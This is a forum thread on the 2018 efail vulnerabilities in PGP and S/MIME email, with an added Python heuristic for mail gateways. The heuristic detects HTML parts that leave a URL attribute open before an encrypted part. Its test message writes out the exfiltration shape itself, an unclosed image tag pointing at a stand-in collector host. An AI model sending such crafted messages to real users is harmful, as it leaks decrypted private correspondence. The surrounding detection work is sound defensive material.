
News Researchers warn of PGP/GPG email vulnerabilities

Discussion in 'Article Discussion' started by bit-tech, 14 May 2018.

  1. bit-tech

    Read more
     
  2. leexgx

    Why uninstall it?

    It's the email client that is the issue; if using Thunderbird, it's going to be fixed soon (the problem is not with PGP, it's with the email client).
     
  3. Gareth Halfacree

    The problem is in the OpenPGP and S/MIME standards, which won't be fixed soon - but patches to work around the problem will drop imminently.

    Meanwhile: the article has been updated.

    Full details of the vulnerabilities have now been released on the "efail" website. The vulnerabilities detailed use externally-loaded resources in HTML-format email to exfiltrate plaintext from encrypted emails. Immediate workarounds include disabling decryption in the email client and requiring manual decryption using an external utility - effectively following the EFF's recommendation to uninstall encrypted email add-ons to prevent automatic decryption and thus disclosure of plaintext - and disabling the rendering of HTML emails. Medium-term fixes will come in the form of patches, the researchers have promised, while the long-term solution will be to update the affected standards - OpenPGP, MIME, and S/MIME - to remove the risk altogether.
     
  4. edzieba

    Bloody hell, one of the vulns is an unclosed tag attack?! That is "little bobby tables" level embarrassing.

    To paraphrase Miyazaki, "HTML in email was a mistake".
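
Added example, not part of the thread or of the efail researchers' material: a heuristic mail-gateway check for the message shape discussed in the two posts above, where an HTML part leaves a quoted URL attribute open immediately before an encrypted part. The function names, the `.invalid` hosts and the sample messages are constructed for illustration.

```python
import email
import re
from email import policy

ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime", "application/x-pkcs7-mime"}
PGP_ARMOR = b"-----BEGIN PGP MESSAGE-----"
# URL-bearing attribute whose opening quote is never closed before the part ends.
OPEN_ATTR = re.compile(r"""\b(?:src|href|background|action)\s*=\s*["'][^"']*$""", re.I)

def dangling_url_attribute(html: str) -> bool:
    """True if the last tag in the part is unterminated inside a quoted URL attribute."""
    start = html.rfind("<")
    if start == -1 or ">" in html[start:]:
        return False
    return bool(OPEN_ATTR.search(html[start:]))

def is_encrypted(part) -> bool:
    """Heuristic: S/MIME or PGP/MIME content type, or inline PGP armor in a leaf part."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return PGP_ARMOR in (part.get_payload(decode=True) or b"")  # None for containers

def find_suspicious_pairs(raw: str) -> list:
    """Return (index, next_part_type) for each HTML part left open before an encrypted sibling."""
    msg = email.message_from_string(raw, policy=policy.default)
    hits = []
    for container in msg.walk():
        parts = list(container.iter_parts())  # empty for leaf parts
        for idx, (a, b) in enumerate(zip(parts, parts[1:])):
            if (a.get_content_type() == "text/html"
                    and dangling_url_attribute(a.get_content())
                    and is_encrypted(b)):
                hits.append((idx, b.get_content_type()))
    return hits

def sample(first_html: str) -> str:
    """Constructed test message: one HTML part followed by a dummy S/MIME part."""
    return (
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/mixed; boundary="B"\n\n'
        "--B\nContent-Type: text/html\n\n" + first_html + "\n"
        "--B\nContent-Type: application/pkcs7-mime; smime-type=enveloped-data\n"
        "Content-Transfer-Encoding: base64\n\nAAAA\n--B--\n"
    )

if __name__ == "__main__":
    print(find_suspicious_pairs(sample('<img src="http://collector.invalid/')))
    print(find_suspicious_pairs(sample('<p><img src="http://cdn.invalid/logo.png"></p>')))
```

A hit is a triage signal for quarantine or plain-text-only delivery, not proof of malice, and the check does not cover messages whose ciphertext itself has been modified.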
     
  5. Corky42

    The first thing I do with any email client is to disable HTML and/or only display in plain text. I guess there must be loads of reasons for HTML emails but they've always seemed to be on the wrong side of my risk/reward mentality.
     
  6. jb0

    Honestly, the problem is that SMTP is not designed to BE a secure communications platform. PGP is more secure than nothing, but operating on top of SMTP places limits on how secure it can actually be.
     
  7. leexgx

    That has nothing to do with this issue.

    SMTP / POP3 and so on are the communication methods used to deliver emails.

    It's the content and how the client interacts with it that is the issue (HTML in emails is never a good idea).
     